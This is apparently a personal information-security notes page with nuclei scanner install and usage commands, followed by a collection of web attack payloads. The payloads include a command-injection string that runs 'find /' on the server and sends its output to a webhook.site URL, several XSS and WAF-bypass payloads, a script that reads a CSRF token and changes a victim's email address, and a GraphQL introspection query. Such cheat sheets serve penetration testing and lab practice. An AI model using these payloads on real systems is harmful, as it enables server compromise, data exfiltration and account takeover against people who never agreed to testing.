
Info
This page is where I store commands, configuration snippets and other notes around information security.
Nuclei
Info
A fast and customizable vulnerability scanner based on a simple YAML-based DSL.
Install nuclei
To install nuclei, make sure Go is installed on your host; that is the fastest way to get nuclei onto the machine:
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Or you can install the binary from the nuclei release page:
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.3.0/nuclei_3.3.0_linux_amd64.zip
mkdir -p nuclei_unzip
unzip -d nuclei_unzip nuclei_3.3.0_linux_amd64.zip
sudo mv ./nuclei_unzip/nuclei /usr/local/bin
rm -rf nuclei_unzip nuclei_3.3.0_linux_amd64.zip
Setup nuclei-templates as default
Info
This is useful when you have trimmed or customized your nuclei-templates and want that directory to become the default templates nuclei uses when it runs against a target:
nuclei -update-template-dir /path/to/your/nuclei-templates/
Specific templates and tags for a scan of a set of endpoints
nuclei -tags lfi,ssrf,rce -t dast/vulnerabilities/ -l targets.txt
Run nuclei against an Android app
When pentesting the Android platform you will need a couple of tools:
- apktool : a tool for reverse engineering Android apk files
- mobile-nuclei-templates : nuclei-templates for mobile platforms
First of all, decompile the apk with apktool to get at the metadata and resources inside the target:
java -jar apktool_2.9.3.jar d /path/to/apk -o /path/to/output_apktool
Now you can run nuclei over the apktool output:
# NOTE: install the mobile nuclei templates into a mobile/ directory inside your default nuclei-templates location
echo /path/to/output_apktool | nuclei -t mobile/
Command Injection
With webhook
<embed src=1 onload="fetch(./?eval=require( 'child_process' ).spawnSync( 'find', ['/']).stdout.toString()).then(a=>a.text()).then(a=>fetch('https://webhook.site/ae0bd822-b34b-4e87-aa65-3c22bc4c9999?c=%27+btoa(a)))%22%3E
Note
The payload runs a find command on / and then sends all of its output as plain text to the webhook URL https://webhook.site/...
Cross Site Scripting ( XSS )
Payloads used to bypass specific situations
onmouseover="alert('xss')
"><svg onload="alert('xss')">
<img src=# onerror='alert(1)'>
javascript:alert('xss')
'-alert(document.domain)-'
';alert(document.domain)//
<svg><animatetransform onbegin=alert(1) attributeName=transform>
DOM XSS with Angular expression
{{constructor.constructor('alert(1)')()}}
Arithmetic operator with JS → causes reflected DOM XSS
\"-alert(1)}//
Stored DOM XSS bypassing the encoded brackets
<><img src=1 onerror=alert(1)>
Script for executing a CSRF form via XSS using the CSRF token
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Tips for causing XSS when blocked by a WAF (web application firewall)
- Brute force to find which tags are still allowed
- Try which event attributes work with an allowed tag
- Then force the website to fire that event → the XSS executes. For example:
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
Use your own tag
Info
If the server blocks every tag that could be injected into the code → we need to create our own, like
<xss>
<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x
Payload that triggers the reflected XSS through a key press event (accesskey)
%27accesskey=%27x%27onclick=%27alert(1)
Add a backslash \ to bypass the filter
Info
In a case where the server adds a backslash \ after you input a quote, cause the reflected XSS by using the closing tag </script> to escape that situation, and then the payload:
<\script><script>alert(1)<\script>
GraphQL
Info
A helpful reference is the article Hackwekend - Session 3 Attack and Exploit GraphQL
GraphQL query to get the full introspection
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}